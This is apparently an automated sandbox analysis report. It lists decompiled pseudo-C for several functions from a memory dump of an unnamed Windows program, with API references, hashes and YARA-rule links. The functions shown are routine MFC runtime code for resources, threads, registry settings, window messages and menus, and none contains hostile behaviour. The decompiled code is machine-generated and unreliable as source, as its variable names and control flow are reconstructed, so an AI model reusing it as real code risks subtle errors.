			E00415530(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8, char _a12) {
				intOrPtr* _v0;
				void* _v4;
				signed int _v8;
				intOrPtr _v16;
				void* _t20;
				intOrPtr* _t23;
				void* _t29;
				void* _t31;
				intOrPtr _t35;
				char _t36;
				void* _t40;
				void* _t42;
				void* _t44;

				_t44 = __eflags;
				_t31 = __ebx;
				_push(4);
				E004271DA(E0043A538, __ebx, __edi, __esi);
				_t35 = E0040A3C7(_t44, 0xc);
				_v16 = _t35;
				_t20 = 0;
				_v4 = 0;
				if(_t35 != 0) {
					_t20 = E0041551A(_t35);
				}
				_t36 = _a4;
				_v8 = _v8 | 0xffffffff;
				 *((intOrPtr*)(_t20 + 8)) = _t36;
				_a4 = _t20;
				E00429326( &_a4, 0x448844);
				asm("int3");
				_t40 = _t42;
				_t23 = _v0;
				_push(_t31);
				if(_t23 != 0) {
					 *_t23 = 0;
				}
				if(FormatMessageA(0x1100, 0,  *(_t36 + 8), 0x800,  &_a12, 0, 0) != 0) {
					E00414516(_t40, _a4, _a8, _a12, 0xffffffff);
					LocalFree(_a12);
					_t29 = 1;
					__eflags = 1;
				} else {
					 *_a4 = 0;
					_t29 = 0;
				}
				return _t29;
			}

0x00415530
0x00415530
0x00415530
0x00415537
0x00415544
0x00415546
0x00415549
0x0041554d
0x00415550
0x00415552
0x00415552
0x00415557
0x0041555a
0x0041555e
0x00415561
0x0041556d
0x00415572
0x00415574
0x00415576
0x00415579
0x0041557e
0x00415580
0x00415580
0x0041559e
0x004155b4
0x004155bf
0x004155c7
0x004155c7
0x004155a0
0x004155a3
0x004155a5
0x004155a5
0x004155ca

APIs

__EH_prolog3.LIBCMT ref: 00415537

Part of subcall function 0040A3C7: _malloc.LIBCMT ref: 0040A3E1

__CxxThrowException@8.LIBCMT ref: 0041556D
FormatMessageA.KERNEL32(00001100,00000000,?,00000800,?,00000000,00000000,00000000,?,?,00448844,00000004,00401D16,000000FF,0040568B,80070057), ref: 00415596

Part of subcall function 00414516: _wctomb_s.LIBCMT ref: 00414526

LocalFree.KERNEL32(?), ref: 004155BF

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
String ID:
API String ID: 1615547351-0
Opcode ID: 0d72671eee02e48caac66a4637e4ad43f6b9d7f32962a9397a3a3e597e0908f4
Instruction ID: 0e3807eedf53c79759ce1e4240ded00668994b3f669a947a509e54d3546cfa04
Opcode Fuzzy Hash: 0d72671eee02e48caac66a4637e4ad43f6b9d7f32962a9397a3a3e597e0908f4
Instruction Fuzzy Hash: 2E119171614248FFDB00DFA4DC419EE3BAAFF08358F10852AF915CA2D1D731C9508B18

Uniqueness

Uniqueness Score: -1.00%

Function 0040C4E7, Relevance: 6.1, APIs: 4, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040C4E7(void* __ecx) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t23;
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t32;
				signed int _t34;
				signed short _t35;
				void* _t37;
				signed short* _t40;

				_push(__ecx);
				_push(_t28);
				_t37 = __ecx;
				_t42 =  *((intOrPtr*)(__ecx + 0x58));
				_t40 =  *(__ecx + 0x60);
				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t32 =  *(E0040E67F(_t28, __ecx, _t40, _t42) + 0xc);
					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t37 + 0x58), 5));
				}
				if(_v8 != 0) {
					_t40 = LockResource(_v8);
				}
				_t30 = 1;
				if(_t40 != 0) {
					_t35 =  *_t40;
					if(_t40[1] != 0xffff) {
						_t23 = _t40[5] & 0x0000ffff;
						_t34 = _t40[6] & 0x0000ffff;
					} else {
						_t35 = _t40[6];
						_t23 = _t40[9] & 0x0000ffff;
						_t34 = _t40[0xa] & 0x0000ffff;
					}
					if((_t35 & 0x00001801) != 0 || _t23 != 0 || _t34 != 0) {
						_t30 = 0;
					}
				}
				if( *(_t37 + 0x58) != 0) {
					FreeResource(_v8);
				}
				return _t30;
			}

0x0040c4ea
0x0040c4eb
0x0040c4ee
0x0040c4f0
0x0040c4f7
0x0040c4fa
0x0040c4fd
0x0040c504
0x0040c51b
0x0040c51b
0x0040c522
0x0040c52d
0x0040c52d
0x0040c531
0x0040c534
0x0040c53c
0x0040c53e
0x0040c54d
0x0040c551
0x0040c540
0x0040c540
0x0040c543
0x0040c547
0x0040c547
0x0040c55a
0x0040c566
0x0040c566
0x0040c55a
0x0040c56c
0x0040c571
0x0040c571
0x0040c57d

APIs

FindResourceA.KERNEL32(?,00000000,00000005), ref: 0040C50D
LoadResource.KERNEL32(?,00000000), ref: 0040C515
LockResource.KERNEL32(00000000), ref: 0040C527
FreeResource.KERNEL32(00000000), ref: 0040C571

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: c5d419951ce71152c8b9a79ed25944e7f7c4a3439dcf843d114cd39df39cced2
Instruction ID: 452ad7219b658c0123a1ad20f4e61f84202e93c84e9552a1bdb920e1fafa372e
Opcode Fuzzy Hash: c5d419951ce71152c8b9a79ed25944e7f7c4a3439dcf843d114cd39df39cced2
Instruction Fuzzy Hash: DB118B38500721FBCB24AF65DC88AABB7B8EF00765B10427AE84263690D778ED40D754

Uniqueness

Uniqueness Score: -1.00%

Function 0040B049, Relevance: 6.1, APIs: 4, Instructions: 56
threadCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040B049(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t37;
				intOrPtr _t43;
				void* _t45;
				intOrPtr* _t51;
				void* _t52;
				void* _t53;

				_t53 = __eflags;
				_t46 = __ecx;
				_t44 = __ebx;
				_push(4);
				E004271DA(E0043990F, __ebx, __edi, __esi);
				_t51 = __ecx;
				 *((intOrPtr*)(_t52 - 0x10)) = __ecx;
				E0040D409(__ebx, __ecx, __edi, __ecx, _t53);
				_t54 =  *((intOrPtr*)(_t52 + 8));
				 *((intOrPtr*)(_t52 - 4)) = 0;
				 *_t51 = 0x43d84c;
				if( *((intOrPtr*)(_t52 + 8)) == 0) {
					 *((intOrPtr*)(_t51 + 0x50)) = 0;
				} else {
					_t43 = E004278B1( *((intOrPtr*)(_t52 + 8)));
					_pop(_t46);
					 *((intOrPtr*)(_t51 + 0x50)) = _t43;
				}
				_t45 = E0040E67F(_t44, 0, _t51, _t54);
				_t55 = _t45;
				if(_t45 == 0) {
					L4:
					E00415838(_t46);
				}
				_t7 = _t45 + 0x74; // 0x74
				_t46 = _t7;
				_t37 = E0040ACB5(_t45, _t7, 0, _t51, _t55);
				if(_t37 == 0) {
					goto L4;
				}
				 *((intOrPtr*)(_t37 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x2c)) = GetCurrentThread();
				 *((intOrPtr*)(_t51 + 0x30)) = GetCurrentThreadId();
				 *((intOrPtr*)(_t45 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x44)) = 0;
				 *((intOrPtr*)(_t51 + 0x7c)) = 0;
				 *((intOrPtr*)(_t51 + 0x64)) = 0;
				 *((intOrPtr*)(_t51 + 0x68)) = 0;
				 *((intOrPtr*)(_t51 + 0x54)) = 0;
				 *((intOrPtr*)(_t51 + 0x60)) = 0;
				 *((intOrPtr*)(_t51 + 0x88)) = 0;
				 *((intOrPtr*)(_t51 + 0x58)) = 0;
				 *((short*)(_t51 + 0x92)) = 0;
				 *((short*)(_t51 + 0x90)) = 0;
				 *((intOrPtr*)(_t51 + 0x48)) = 0;
				 *((intOrPtr*)(_t51 + 0x8c)) = 0;
				 *((intOrPtr*)(_t51 + 0x80)) = 0;
				 *((intOrPtr*)(_t51 + 0x84)) = 0;
				 *((intOrPtr*)(_t51 + 0x70)) = 0;
				 *((intOrPtr*)(_t51 + 0x74)) = 0;
				 *((intOrPtr*)(_t51 + 0x94)) = 0;
				 *((intOrPtr*)(_t51 + 0x9c)) = 0;
				 *((intOrPtr*)(_t51 + 0x5c)) = 0;
				 *((intOrPtr*)(_t51 + 0x6c)) = 0;
				 *((intOrPtr*)(_t51 + 0x98)) = 0x200;
				return E004272B2(_t51);
			}

0x0040b049
0x0040b049
0x0040b049
0x0040b049
0x0040b050
0x0040b055
0x0040b057
0x0040b05a
0x0040b061
0x0040b064
0x0040b067
0x0040b06d
0x0040b07d
0x0040b06f
0x0040b072
0x0040b077
0x0040b078
0x0040b078
0x0040b085
0x0040b087
0x0040b089
0x0040b08b
0x0040b08b
0x0040b08b
0x0040b090
0x0040b090
0x0040b093
0x0040b09a
0x00000000
0x00000000
0x0040b09c
0x0040b0a5
0x0040b0ae
0x0040b0b1
0x0040b0b4
0x0040b0b7
0x0040b0ba
0x0040b0bd
0x0040b0c0
0x0040b0c3
0x0040b0c6
0x0040b0cc
0x0040b0cf
0x0040b0d6
0x0040b0dd
0x0040b0e0
0x0040b0e6
0x0040b0ec
0x0040b0f2
0x0040b0f5
0x0040b0f8
0x0040b0fe
0x0040b104
0x0040b107
0x0040b10a
0x0040b11b

APIs

__EH_prolog3.LIBCMT ref: 0040B050

Part of subcall function 0040D409: __EH_prolog3.LIBCMT ref: 0040D410

__strdup.LIBCMT ref: 0040B072
GetCurrentThread.KERNEL32 ref: 0040B09F
GetCurrentThreadId.KERNEL32 ref: 0040B0A8

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentH_prolog3Thread$__strdup
String ID:
API String ID: 4206445780-0
Opcode ID: d08cbb42f7829d8fc1eb43041b58f2a8b390b29b8eccb72e1eb7ae40a5bd5ba6
Instruction ID: e3dbe98dd3ec71c2ad8b397099d7e64109d9ebff292d09053dae40381d84b132
Opcode Fuzzy Hash: d08cbb42f7829d8fc1eb43041b58f2a8b390b29b8eccb72e1eb7ae40a5bd5ba6
Instruction Fuzzy Hash: 1021B0B0800B00CFC3219F3A914564AFBF8BFA4304F10892FE5AA87761D7B4A441CF48

Uniqueness

Uniqueness Score: -1.00%

Function 0040B5DA, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040B5DA(intOrPtr* __ecx, intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				struct HRSRC__* _t25;
				void* _t28;
				intOrPtr* _t34;
				void* _t36;
				intOrPtr _t37;
				struct HINSTANCE__* _t39;

				_push(__ecx);
				_t28 = 0;
				_t40 = _a8;
				_push(_t36);
				_t34 = __ecx;
				_v8 = 0;
				if(_a8 == 0) {
					L4:
					_t37 = _a4;
					_a8 = 1;
					if(_t28 != 0) {
						_a8 =  *((intOrPtr*)( *_t34 + 0x20))(_t37, _t28, _a12);
						if(_v8 != 0) {
							FreeResource(_v8);
						}
					}
					if( *((intOrPtr*)(_t37 + 0x4c)) != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x4c)))) + 0xa0))(_a12);
					}
					_t18 = _a8;
					L10:
					return _t18;
				}
				_t39 =  *(E0040E67F(0, __ecx, _t36, _t40) + 0xc);
				_t25 = FindResourceA(_t39, _a8, 0xf0);
				if(_t25 == 0) {
					goto L4;
				}
				_t18 = LoadResource(_t39, _t25);
				_v8 = _t18;
				if(_t18 == 0) {
					goto L10;
				}
				_t28 = LockResource(_t18);
				goto L4;
			}

0x0040b5dd
0x0040b5df
0x0040b5e1
0x0040b5e4
0x0040b5e6
0x0040b5e8
0x0040b5eb
0x0040b620
0x0040b622
0x0040b625
0x0040b62c
0x0040b63e
0x0040b641
0x0040b646
0x0040b646
0x0040b641
0x0040b650
0x0040b65a
0x0040b65a
0x0040b660
0x0040b663
0x0040b667
0x0040b667
0x0040b5f2
0x0040b5fe
0x0040b606
0x00000000
0x00000000
0x0040b60a
0x0040b612
0x0040b615
0x00000000
0x00000000
0x0040b61e
0x00000000

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 0040B5FE
LoadResource.KERNEL32(?,00000000), ref: 0040B60A
LockResource.KERNEL32(00000000), ref: 0040B618
FreeResource.KERNEL32(00000000), ref: 0040B646

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: b58ae0d85b09dff1975f10736891b940827677274e0d18c4022cf9f07116e95f
Instruction ID: 91548c4a369eca74d0a45b863ff4c739adc9bab732584e947e77df1b70f85c74
Opcode Fuzzy Hash: b58ae0d85b09dff1975f10736891b940827677274e0d18c4022cf9f07116e95f
Instruction Fuzzy Hash: BF114C71600209EFDB109F65D888AAFBBB9EF04360F04847AF905A72A0CB75DD00DF69

Uniqueness

Uniqueness Score: -1.00%

Function 004129EB, Relevance: 6.1, APIs: 4, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E004129EB(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi) {
				char _v20;
				struct HWND__* _t17;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t28 = __edx;
				_t26 = __ecx;
				_t33 = __ecx;
				_push(__edi);
				if( *((intOrPtr*)( *__ecx + 0x120))() != 0) {
					_t26 = __ecx;
					 *((intOrPtr*)( *__ecx + 0x170))();
				}
				SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
				E0041176E(0, _t26, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
				_t27 = _t33;
				_t34 = E00412138(_t27, _t28, SendMessageA);
				if(_t34 != 0) {
					SendMessageA( *(_t34 + 0x20), 0x1f, 0, 0);
					E0041176E(0, _t27, _t28,  *(_t34 + 0x20), 0x1f, 0, 0, 1, 1);
					_t17 = GetCapture();
					if(_t17 != 0) {
						_t17 = SendMessageA(_t17, 0x1f, 0, 0);
					}
					return _t17;
				} else {
					_push(_t27);
					_t7 =  &_v20; // 0x44e938
					_v20 = 0x44e9d0;
					E00429326(_t7, 0x448990);
					asm("int3");
					_t20 = _t27;
					 *((intOrPtr*)(_t20 + 4)) = 1;
					return _t20;
				}
			}

0x004129eb
0x004129eb
0x004129ed
0x004129f1
0x004129fa
0x004129fe
0x00412a00
0x00412a00
0x00412a15
0x00412a22
0x00412a27
0x00412a2e
0x00412a32
0x00412a40
0x00412a4d
0x00412a52
0x00412a5a
0x00412a61
0x00412a61
0x00412a66
0x00412a34
0x0041583b
0x00415841
0x00415845
0x0041584c
0x00415851
0x00415852
0x00415854
0x0041585b
0x0041585b

APIs

SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 00412A15
SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 00412A40

Part of subcall function 0041176E: GetTopWindow.USER32(?), ref: 0041177C

GetCapture.USER32 ref: 00412A52
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00412A61

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$CaptureWindow
String ID:
API String ID: 729421689-0
Opcode ID: bf753591ba1ccfb7c80f72f7c28a9709545013a34ef483cba670ce9c11f68047
Instruction ID: 61ae6b1a3acacbbcba607ac23b67b764360fef80429002832345ad31330dcf4c
Opcode Fuzzy Hash: bf753591ba1ccfb7c80f72f7c28a9709545013a34ef483cba670ce9c11f68047
Instruction Fuzzy Hash: 50018F713502197FFA302B208DC9FFB36ADFF48B88F010539F381AA1E2CA955C509A24

Uniqueness

Uniqueness Score: -1.00%

Function 00416A29, Relevance: 6.1, APIs: 4, Instructions: 55
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00416A29(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
				signed int _v8;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				CHAR* _t21;
				char* _t24;
				intOrPtr _t28;
				void* _t30;
				signed int _t31;

				_t28 = __edx;
				_t13 =  *0x44f5d0; // 0x765b253d
				_v8 = _t13 ^ _t31;
				_t24 = _a8;
				_t30 = __ecx;
				_t29 = _a4;
				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					E004276EB( &_v24, 0x10, "%d", _a12);
					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(__ecx + 0x68));
				} else {
					_t30 = E004169E3(__ecx, _t29);
					if(_t30 != 0) {
						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
						_t29 = _t21;
						RegCloseKey(_t30);
						_t18 = 0 | _t21 == 0x00000000;
					}
				}
				return E0042569C(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
			}

0x00416a29
0x00416a2f
0x00416a36
0x00416a3a
0x00416a3e
0x00416a45
0x00416a48
0x00416a88
0x00416a99
0x00416a4a
0x00416a50
0x00416a54
0x00416a62
0x00416a69
0x00416a6b
0x00416a75
0x00416a75
0x00416a54
0x00416aad

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 00416A62
RegCloseKey.ADVAPI32(00000000), ref: 00416A6B
_swprintf.LIBCMT ref: 00416A88
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00416A99

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: ClosePrivateProfileStringValueWrite_swprintf
String ID:
API String ID: 4210924919-0
Opcode ID: fc93939a6b91339be01e6fdb81c27ce67dbd4525534cd9702f361351fb3cfd11
Instruction ID: 1ae63901b30b5ac98aa2f3c0d4395abd995b51cb351bb439d2b44a4c400a6120
Opcode Fuzzy Hash: fc93939a6b91339be01e6fdb81c27ce67dbd4525534cd9702f361351fb3cfd11
Instruction Fuzzy Hash: 9A01D272A00309BBDB10DF689D45FBF73BCAF09B08F11042ABA01E7141DA78ED0587A8

Uniqueness

Uniqueness Score: -1.00%

Function 0041B9C0, Relevance: 6.1, APIs: 4, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0041B9C0(void* __edi, void* __esi, void* __eflags, intOrPtr _a4, RECT* _a8, int _a12) {
				intOrPtr _v8;
				char _v12;
				struct tagRECT _v28;
				intOrPtr _t35;

				_t35 = _a4;
				E0040E6CB( &_v12, __eflags,  *((intOrPtr*)(_t35 - 0xb0)));
				if(_a8 != 0) {
					IntersectRect( &_v28, _a8, _t35 - 0x9c);
					EqualRect( &_v28, _a8);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if(IsRectEmpty( &_v28) == 0) {
					InvalidateRect( *( *((intOrPtr*)( *((intOrPtr*)(_t35 - 0xac)) + 0x20)) + 0x20),  &_v28, _a12);
				}
				if(_v8 != 0) {
					_push(_v12);
					_push(0);
					E0040DF8F();
				}
				return 0;
			}

0x0041b9c7
0x0041b9d3
0x0041b9dc
0x0041b9ff
0x0041ba0c
0x0041b9de
0x0041b9e9
0x0041b9ea
0x0041b9eb
0x0041b9ec
0x0041b9ee
0x0041ba1e
0x0041ba33
0x0041ba33
0x0041ba3e
0x0041ba40
0x0041ba43
0x0041ba45
0x0041ba45
0x0041ba4d

APIs

IntersectRect.USER32 ref: 0041B9FF
EqualRect.USER32 ref: 0041BA0C
IsRectEmpty.USER32(?), ref: 0041BA16
InvalidateRect.USER32(?,?,?), ref: 0041BA33

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$EmptyEqualIntersectInvalidate
String ID:
API String ID: 3354205298-0
Opcode ID: f85ff242f65f50916ce2324d12660bed923c07894f4a96194953166024e75dbd
Instruction ID: 621094d138bfd5d8e9ffd997e008beb84c9a1060c2a417ba5408c893d9d79013
Opcode Fuzzy Hash: f85ff242f65f50916ce2324d12660bed923c07894f4a96194953166024e75dbd
Instruction Fuzzy Hash: 1C11187290021AEFCF01DF95D889EDEBBB9FF14305F004062FA05A7151D3359A968FA4

Uniqueness

Uniqueness Score: -1.00%

Function 00421058, Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00421058(void* __ecx, void* __eflags) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t9;
				void* _t11;
				int _t13;
				void* _t23;
				intOrPtr* _t30;
				void* _t32;
				void* _t34;
				void* _t35;

				_push(__ecx);
				_t23 = __ecx;
				_t9 = E0040A3C7(__eflags, 0x10);
				_t37 = _t9;
				if(_t9 == 0) {
					_t30 = 0;
					__eflags = 0;
				} else {
					_t30 = E0042103B(_t9, _t37);
				}
				_t11 = GetCurrentProcess();
				_t13 = DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2);
				_t34 = _t32;
				if(_t13 == 0) {
					if(_t30 != 0) {
						 *((intOrPtr*)( *_t30 + 4))(1);
					}
					E004223EF(_t23, _t30, _t34, _t35, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
				}
				 *((intOrPtr*)(_t30 + 4)) = _v8;
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t23 + 8));
				return _t30;
			}

0x0042105b
0x00421060
0x00421062
0x00421067
0x0042106a
0x00421077
0x00421077
0x0042106c
0x00421073
0x00421073
0x0042108a
0x00421093
0x0042109b
0x0042109c
0x004210a0
0x004210a8
0x004210a8
0x004210b5
0x004210b5
0x004210bd
0x004210c3
0x004210cb

APIs

Part of subcall function 0040A3C7: _malloc.LIBCMT ref: 0040A3E1

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 0042108A
GetCurrentProcess.KERNEL32(?,00000000), ref: 00421090
DuplicateHandle.KERNEL32(00000000), ref: 00421093
GetLastError.KERNEL32(?), ref: 004210AE

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
String ID:
API String ID: 3704204646-0
Opcode ID: 3001ec32658d2118e8f050b3ca47a5352fbe3cbfc67b51ea32acf34abcb294b1
Instruction ID: 6b148a983b61da440491e10ff45ef86759a416b9c56171b25e27b92fa1848639
Opcode Fuzzy Hash: 3001ec32658d2118e8f050b3ca47a5352fbe3cbfc67b51ea32acf34abcb294b1
Instruction Fuzzy Hash: 7501D431B00210ABDB109BB6EC89F1B7BA9EF84754F144066F905CB251DA75DC41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040CDBC, Relevance: 6.0, APIs: 4, Instructions: 50
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040CDBC(void* __ecx, void* __edi, void* __ebp, signed int _a4) {
				void* __ebx;
				void* _t16;
				int _t17;
				int _t18;
				intOrPtr _t25;
				intOrPtr _t33;
				void* _t35;

				_t35 = __ecx;
				_t25 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t25 == 0) {
					if( *((intOrPtr*)(__ecx + 0x14)) == 0) {
						L3:
						_t17 = E00415838(_t25);
						L4:
						asm("sbb edx, edx");
						_t18 = EnableMenuItem( *(_t25 + 4), _t17, ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000400);
						L11:
						 *((intOrPtr*)(_t35 + 0x18)) = 1;
						return _t18;
					}
					if(_a4 == 0) {
						_t33 =  *((intOrPtr*)(__ecx + 0x14));
						if(GetFocus() ==  *(_t33 + 0x20)) {
							SendMessageA( *(E00410E42(0, __ebp, GetParent( *(_t33 + 0x20))) + 0x20), 0x28, 0, 0);
						}
					}
					_t18 = E00415A8F( *((intOrPtr*)(_t35 + 0x14)), _a4);
					goto L11;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
					_t17 =  *(__ecx + 8);
					if(_t17 <  *((intOrPtr*)(__ecx + 0x20))) {
						goto L4;
					}
					goto L3;
				}
				return _t16;
			}

0x0040cdbe
0x0040cdc0
0x0040cdc7
0x0040cdff
0x0040cdd6
0x0040cdd6
0x0040cddb
0x0040cde1
0x0040cdf4
0x0040ce3f
0x0040ce3f
0x00000000
0x0040ce3f
0x0040ce05
0x0040ce08
0x0040ce14
0x0040ce2c
0x0040ce2c
0x0040ce32
0x0040ce3a
0x00000000
0x0040ce3a
0x0040cdcc
0x0040cdce
0x0040cdd4
0x00000000
0x00000000
0x00000000
0x0040cdd4
0x0040ce48

APIs

EnableMenuItem.USER32 ref: 0040CDF4

Part of subcall function 00415838: __CxxThrowException@8.LIBCMT ref: 0041584C

GetFocus.USER32 ref: 0040CE0B
GetParent.USER32(?), ref: 0040CE19
SendMessageA.USER32(?,00000028,00000000,00000000), ref: 0040CE2C

Memory Dump Source

